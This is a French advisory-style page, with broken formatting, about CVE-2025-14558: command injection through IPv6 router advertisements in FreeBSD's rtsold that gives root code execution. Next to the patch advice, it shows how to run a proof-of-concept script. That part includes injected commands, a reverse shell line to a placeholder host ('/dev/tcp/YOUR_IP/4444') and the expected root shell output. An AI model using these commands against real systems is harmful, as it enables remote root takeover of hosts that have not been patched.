
CVE-2025-14558
CVE-2025-14558 est une vulnérabilité critique d'exécution de code à distance (RCE) affectant les systèmes FreeBSD qui utilisent les services de sollicitation de routeur IPv6. Un défaut dans la gestion des entrées réseau non fiables permet aux attaquants d'exécuter des commandes shell arbitraires.
rtsol(8)rtsold(8)resolvconf(8)En cas d'exploitation réussie, un attaquant peut :
Actions fortement recommandées :
rtsol / rtsold si les RA IPv6 ne sont pas nécessairesTout système FreeBSD écoutant les annonces de routeur IPv6 sur un réseau non fiable est à haut risque. Corrigez immédiatement ou désactivez les services concernés.
Si le script PoC pour CVE-2025-14558 fonctionne avec succès sur un système FreeBSD vulnérable (non corrigé, avec rtsold en cours d'exécution et traitant les messages RA IPv6) :
rtsold s'exécute en tant que root et appelle /sbin/resolvconf avec le domaine malveillant).Pour un test simple comme --command "id > /tmp/pwned" :
Un fichier /tmp/pwned est créé contenant une sortie comme :
uid=0(root) gid=0(wheel) groups=0(wheel)
Pour --command "touch /tmp/exploit_success" :
/tmp/exploit_success apparaît.Pour un reverse shell comme --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1" :
Vérifiez sur la cible avec des commandes comme :
ls -l /tmp/pwned
cat /tmp/pwned
Le script affiche :
[+] Sending malicious RA on eth0
[+] Injected command: id > /tmp/pwned
[+] Target must run vulnerable rtsold and process the RA
[+] Done. Check target for execution (e.g. /tmp/pwned)
Pour un reverse shell : En cas de succès, votre nc -lvnp 4444 obtient une connexion et un shell root :
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
bash: cannot set terminal process groups: No job control in this shell
bash: no job control in this shell
root@vulnerable-host:~ #
(Vous avez maintenant un shell root – tapez des commandes comme id, whoami, etc.)
rtsold ne tourne pas, pas sur le même réseau L2, pare-feu bloquant les RA, ou IPv6 désactivé.Ceci n'est observable que dans un laboratoire contrôlé sur un système FreeBSD vulnérable (avant le correctif du 16 décembre 2025). Aucun rapport d'exploitation publique dans le monde réel au 23 décembre 2025. Corrigez immédiatement en production.